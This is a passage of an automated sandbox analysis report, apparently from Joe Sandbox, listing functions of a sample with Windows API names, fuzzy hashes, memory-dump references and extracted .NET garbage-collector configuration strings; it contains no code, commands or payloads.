                                                                Function 00007FF708E417D0 Relevance: .3, Instructions: 317COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc40696c06efc7eeed024249625f4d97e625dca38b2884aebdd6ee930d4a32e6
                                                                • Instruction ID: c98d97ef6e59482932e6307b804b605350dddfbe705bf8eac7eedf77ce840e3f
                                                                • Opcode Fuzzy Hash: bc40696c06efc7eeed024249625f4d97e625dca38b2884aebdd6ee930d4a32e6
                                                                • Instruction Fuzzy Hash: 88F15D61D1DA4385FA42BF35AD112B5F2B1AF95380FD89339D45D227A2EF7CB0D18228
                                                                Function 00007FF708E21B10 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                                • String ID: @$@$@
                                                                • API String ID: 2645093340-1177533131
                                                                • Opcode ID: 25b54e22bc2e8b5ddc167bdb083e8aeb2d51a517eac328536886e62aa1a06524
                                                                • Instruction ID: bde02bf68601b361ac00ffaeaad51c48dd90a268bb09f551ade01d4351ebd97f
                                                                • Opcode Fuzzy Hash: 25b54e22bc2e8b5ddc167bdb083e8aeb2d51a517eac328536886e62aa1a06524
                                                                • Instruction Fuzzy Hash: 6A4152327087C195EB75AF11E9453AAF3A0FB88B90F844635DA9D53B88CF3CE4468718
                                                                Function 00007FF708E1C2E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                                                                • String ID: PROCESSOR_COUNT
                                                                • API String ID: 1701933505-4048346908
                                                                • Opcode ID: 1537927de8e3d4f3dc4269708106878297a73e833d9ce78a6a5bb3c1c1c087fe
                                                                • Instruction ID: 6b66a4fb912b6d8aee706a3d7c0fd83ef63e86efea91a11d7fe1af9951f00e44
                                                                • Opcode Fuzzy Hash: 1537927de8e3d4f3dc4269708106878297a73e833d9ce78a6a5bb3c1c1c087fe
                                                                • Instruction Fuzzy Hash: BB315B71A0CA4286EF14AB50DC803BDE3A1AF84794FE401B5D64E86795DF3CE809D768
                                                                Function 00007FF708E15F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF708E16016
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFailFastRaise$Sleep
                                                                • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                                • API String ID: 3706814929-926682358
                                                                • Opcode ID: 5f4cae0a80642e33d3ba0d3458e872a0420229c01c31e149844a6f6bf468fd17
                                                                • Instruction ID: 994b158f8963b9ecd75b279c9bede349717d9dbc35c66d90b75854267a834997
                                                                • Opcode Fuzzy Hash: 5f4cae0a80642e33d3ba0d3458e872a0420229c01c31e149844a6f6bf468fd17
                                                                • Instruction Fuzzy Hash: E7410C32A19A4286EBA0EF19EC40379F3A1EF45B84F884179DE4D423A5CF3DE591C764
                                                                Function 00007FF708E1C540 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Thread$CloseCreateHandlePriorityResume
                                                                • String ID:
                                                                • API String ID: 3633986771-0
                                                                • Opcode ID: 2a3c596eec6737d23bcfe879b92be07cfd5c87d60cd55db494ee126cb1fbf920
                                                                • Instruction ID: 194764fb736e01472052062d6cff2a7b7be98ce5b5b92470372a9ec163bbaf72
                                                                • Opcode Fuzzy Hash: 2a3c596eec6737d23bcfe879b92be07cfd5c87d60cd55db494ee126cb1fbf920
                                                                • Instruction Fuzzy Hash: 7BE06DB5E0470282EB14AB71BC18335E352BF99B86F884134CE4E47360EF3CA186C628
                                                                Function 00007FF708E21930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 241 7ff708e21930-7ff708e21961 242 7ff708e21967-7ff708e21982 call 7ff708fdc0c8 call 7ff708e70964 241->242 243 7ff708e21a1f-7ff708e21a3c GlobalMemoryStatusEx 241->243 242->243 268 7ff708e21988-7ff708e21990 242->268 245 7ff708e21ac2-7ff708e21ac5 243->245 246 7ff708e21a42-7ff708e21a45 243->246 247 7ff708e21ac7-7ff708e21acb 245->247 248 7ff708e21ace-7ff708e21ad1 245->248 250 7ff708e21a47-7ff708e21a52 246->250 251 7ff708e21ab1-7ff708e21ab4 246->251 247->248 254 7ff708e21adb-7ff708e21ade 248->254 255 7ff708e21ad3-7ff708e21ad8 248->255 257 7ff708e21a5b-7ff708e21a6c 250->257 258 7ff708e21a54-7ff708e21a59 250->258 252 7ff708e21ab9-7ff708e21abc 251->252 253 7ff708e21ab6 251->253 260 7ff708e21ae8-7ff708e21b0b call 7ff708e70ce0 252->260 261 7ff708e21abe-7ff708e21ac0 252->261 253->252 254->260 263 7ff708e21ae0 254->263 255->254 259 7ff708e21a70-7ff708e21a81 257->259 258->259 265 7ff708e21a8a-7ff708e21a9e 259->265 266 7ff708e21a83-7ff708e21a88 259->266 267 7ff708e21ae5 261->267 263->267 270 7ff708e21aa2-7ff708e21aae 265->270 266->270 267->260 271 7ff708e219fa-7ff708e219ff 268->271 272 7ff708e21992-7ff708e21998 268->272 270->251 273 7ff708e21a11-7ff708e21a14 271->273 274 7ff708e21a01-7ff708e21a04 271->274 275 7ff708e2199a-7ff708e2199f 272->275 276 7ff708e219a1-7ff708e219b5 272->276 273->260 280 7ff708e21a1a 273->280 278 7ff708e21a0b-7ff708e21a0e 274->278 279 7ff708e21a06-7ff708e21a09 274->279 277 7ff708e219b9-7ff708e219ca 275->277 276->277 281 7ff708e219cc-7ff708e219d1 277->281 282 7ff708e219d3-7ff708e219e7 277->282 278->273 279->273 280->267 283 7ff708e219eb-7ff708e219f7 281->283 282->283 283->271
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: CurrentGlobalMemoryProcessStatus
                                                                • String ID: @
                                                                • API String ID: 3261791682-2766056989
                                                                • Opcode ID: b06112669577107fd8364503d11dc8855fa04c93879d22e434d3f090c59512a2
                                                                • Instruction ID: 9a9cedfe8cbcc1982202ef68224fa4f837d932efbd2c19e489dacb956b841983
                                                                • Opcode Fuzzy Hash: b06112669577107fd8364503d11dc8855fa04c93879d22e434d3f090c59512a2
                                                                • Instruction Fuzzy Hash: 704105A2B09B4641EA56DB36D910339E292BF4ABC0F58C735D94E62B44FF3CF5818624
                                                                Function 00007FF708E221E0 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual$CurrentNumaProcess
                                                                • String ID:
                                                                • API String ID: 647533253-0
                                                                • Opcode ID: f8b51e74715dde94abd1a2eca2dc255159dac7dd462f6e1f09a2f5f9a9adf448
                                                                • Instruction ID: 2043d8f37034504dd86fcd47a09ca2a1b8ae397bd4dcaf73f9559c9f20aba7d6
                                                                • Opcode Fuzzy Hash: f8b51e74715dde94abd1a2eca2dc255159dac7dd462f6e1f09a2f5f9a9adf448
                                                                • Instruction Fuzzy Hash: 03F0AF72B0869182EB209B16F800719E760AF49BD5F484238EF8C17B68CF3DD5828B18
                                                                Function 00007FF708E280CB Relevance: 3.1, APIs: 2, Instructions: 106COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Count64Tick
                                                                • String ID:
                                                                • API String ID: 1927824332-0
                                                                • Opcode ID: 65d11064ae8a81124cb3cb9264773367ddaae771f4154bdf3ec6cef6cdc02e0c
                                                                • Instruction ID: 2c898652e1516f716550c69a4079720b7e6db82a7403c592081d2c8a2f5e2d79
                                                                • Opcode Fuzzy Hash: 65d11064ae8a81124cb3cb9264773367ddaae771f4154bdf3ec6cef6cdc02e0c
                                                                • Instruction Fuzzy Hash: 4A419671E08B6781FA24BF65EC546B9E3A0AF01B90F84453AD94D023E5CF3CF8818228
                                                                Function 00007FF708E21210 Relevance: 2.6, APIs: 2, Instructions: 82memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: a926657949caebc06e98a47e9fefde50fa92c9923bdd3d7bd19596d6f9da1f47
                                                                • Instruction ID: 591f10d540c0cbca2b1e98cf19943bc836ad0d683d58567f266f9cb5de127bea
                                                                • Opcode Fuzzy Hash: a926657949caebc06e98a47e9fefde50fa92c9923bdd3d7bd19596d6f9da1f47
                                                                • Instruction Fuzzy Hash: E0318F32B05B5281EA14EB16D90016EF3A4FF49BD4F848139DF5C57B94EF38E5628358
                                                                Function 00007FF708E221A0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Virtual$AllocFree
                                                                • String ID:
                                                                • API String ID: 2087232378-0
                                                                • Opcode ID: d2853f168b4aaff91fe7746528586ae88526957196c988cbea564a60447f1819
                                                                • Instruction ID: 96e81b36fc141e646129ab95df6815300624ca008e777741fc74d77bf647d084
                                                                • Opcode Fuzzy Hash: d2853f168b4aaff91fe7746528586ae88526957196c988cbea564a60447f1819
                                                                • Instruction Fuzzy Hash: 9EE0C234F16201C2EB18AB22AC42A25D2526F59B01FC4C138CA0E42360DF3DA19BCB78
                                                                Function 00007FF708E15360 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFailFastQueryRaiseVirtual
                                                                • String ID:
                                                                • API String ID: 3307674043-0
                                                                • Opcode ID: dffb41d62f828de8248058d7f8a403574a70cc9eda67e19425e5c2b2db6024ab
                                                                • Instruction ID: a98b62781d425c8f35755a789e40a980f26567dc792853745cd7b0f46800a492
                                                                • Opcode Fuzzy Hash: dffb41d62f828de8248058d7f8a403574a70cc9eda67e19425e5c2b2db6024ab
                                                                • Instruction Fuzzy Hash: 92115E72A08B8182EB64EB25B8011AAF3A0FB457B4F544339E6BE477D6DF38D042C744
                                                                Function 00007FF708E71504 Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                • String ID:
                                                                • API String ID: 680105476-0
                                                                • Opcode ID: 230b7232a5cfb6450d6baf8dc0d9aec21bbefeffa579c3a7803147bbff5ae031
                                                                • Instruction ID: 66a4027761ee8a5439cab8a815ce35973272f1b74004095c95d8964ef4efb4d2
                                                                • Opcode Fuzzy Hash: 230b7232a5cfb6450d6baf8dc0d9aec21bbefeffa579c3a7803147bbff5ae031
                                                                • Instruction Fuzzy Hash: 60E0E291F0A38B02F96DF2A22C560B9E1800F49774EAC1B34D93F092C2AF3CA4919138

                                                                Non-executed Functions

                                                                Function 00007FF708E224F8 Relevance: 118.0, Strings: 94, Instructions: 550COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                                                                • API String ID: 0-799405152
                                                                • Opcode ID: 877a6ca6af972fa7a5826739367c456bfd554c59cc4ea3184e6320c2ddd8476f
                                                                • Instruction ID: 6dee3b1b73ab5d5502b11c79584ee126fd50c295f8640c093ba9217e96eef75d
                                                                • Opcode Fuzzy Hash: 877a6ca6af972fa7a5826739367c456bfd554c59cc4ea3184e6320c2ddd8476f
                                                                • Instruction Fuzzy Hash: B842EA61708A9782EB20AB55FD50AAAE3B5FF59788F815133D98D07F24DF3CD2058718
                                                                Function 00007FF708E23250 Relevance: 109.2, Strings: 87, Instructions: 472COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: 00007B5630
